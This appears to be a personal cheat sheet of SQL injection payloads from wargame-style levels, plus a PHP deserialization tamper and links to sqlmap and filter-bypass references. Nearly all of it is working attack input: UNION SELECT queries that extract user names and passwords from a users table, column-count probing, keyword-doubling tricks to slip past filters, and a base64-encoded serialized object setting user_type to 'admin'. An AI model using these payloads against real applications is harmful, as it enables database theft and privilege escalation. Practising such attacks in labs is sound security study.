SQLi Notes
lv2:
-1' union select version(), database(), 3, 4--+
-1' union select id, user, pass, null from users where id=1--+
-1' union select id, user, pass, null from users where id=2--+
lv3:
-1%27+order+by+9--+
-1%27+order+by+5--+
-1%27+order+by+4--+
-1'+unionon+select+database(),version(),(select+user+from+users+order+by+id+asc+limit+1),4--+
-1%27+unionon+all+select+id,user,pass,4+from+users--+
lv4:
-1%27+order+by+5+--+
-1%27+union+select+id,version(),user,pass,5+from+users--+
lv7:
-1+union+select+1,version(),3--+
lv8:
(-1)union(sselectelect(version()),(database()),(user()))
(-1)union(sselectelect(sselectelect(pass)from(users)where(id=1)),(sselectelect(user)from(users)where(id=1)),(user()))
[SQL Injection - medium]
czoxMToiP2FjdD1kYWZ0YXIiOw==
s:11:"?act=daftar";
a:2:{s:4:"user";s:9:"admincool";s:9:"user_type";s:5:"admin";}
YToyOntzOjQ6InVzZXIiO3M6OToiYWRtaW5jb29sIjtzOjk6InVzZXJfdHlwZSI7czo1OiJhZG1pbiI7fQ==
Deserialization
SQLi basics
https://mrrootable.tistory.com/25
MS SQLi summary (SQL Server 2005 and earlier)
sqlmap commands
https://m.blog.naver.com/koromoon/220413846103
https://github.com/sqlmapproject/sqlmap/wiki/Usage
Miscellaneous
https://security04.tistory.com/171
https://hyunmini.tistory.com/59
https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/